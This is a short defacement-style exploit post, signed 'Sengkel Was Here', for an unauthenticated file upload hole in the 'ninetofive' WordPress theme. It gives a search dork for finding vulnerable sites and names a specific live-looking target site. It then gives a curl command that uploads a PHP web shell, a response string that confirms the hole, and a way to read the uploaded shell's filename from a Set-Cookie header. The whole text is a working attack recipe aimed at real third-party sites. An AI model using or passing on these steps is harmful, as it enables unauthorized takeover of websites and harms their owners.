9 to 5 REMOTE EXPLOIT



========== Sengkel Was Here ========
Dork: « /wp-content/themes/ninetofive »
TARGET: http://www.offre-emploi-madagascar.com
Check : wp-content/themes/ninetofive/scripts/doajaxfileupload.php
Exploit : curl -v -F « qqfile=@l.php » « http://www.offre-emploi-madagascar.com/wp-content/themes/ninetofive/scripts/doajaxfileupload.php »
l.php = Shell KITA
« error »: »No files were uploaded. » : Vuln
Set-Cookie: MagnetAttached_1=uploads%2Fd2860ddb9ed3df342e33b23539de7ba9.php; expires=Thu, 26-Mar-2015 05:09:00 GMT; Max
d2860ddb9ed3df342e33b23539de7ba9.php = Akses Shell Kita 😀

thanks to : Mas Deb-X :* , Incef Team Family , NUCY Family , IST Family , And You :*

source

décembre 31st, 2015 by